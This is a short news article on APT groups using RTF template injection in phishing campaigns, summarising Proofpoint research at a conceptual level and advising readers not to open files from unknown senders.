Hackers Are Using RTF Files in Phishing Campaigns
Hackers are increasingly using an RTF template injection technique to phish for information from victims. Three APT hacking groups from India, Russia, and China, used a novel RTF template injection technique in their recent phishing campaigns.
Researchers at Proofpoint first spotted the malicious RTF template injections in March 2021, and the firm expects it to become more widely used as time goes on.
Here’s what’s happening, according to Proofpoint:
This technique, referred to as RTF template injection, leverages the legitimate RTF template functionality. It subverts the plain text document formatting properties of an RTF file and allows the retrieval of a URL resource instead of a file resource via an RTF’s template control word capability. This enables a threat actor to replace a legitimate file destination with a URL from which a remote payload may be retrieved.
To put it simply, threat actors are placing malicious URLs in the RTF file through the template function, which can then load malicious payloads into an application or perform Windows New Technology LAN Manager (NTLM) authentication against a remote URL to steal Windows credentials, which could be disastrous for the user who opens these files.
Where things get really scary is that these have a lower detection rate by antivirus apps when compared to the well-known Office-based template injection technique. That means you might download the RTF file, run it through an antivirus app and think it’s safe when it’s hiding something sinister.
So what can you do to avoid it? Simply don’t download and open RTF files (or any other files, really) from people you don’t know. If something seems suspicious, it probably is. Be careful what you download, and you can mitigate the risk of these RTF template injection attacks.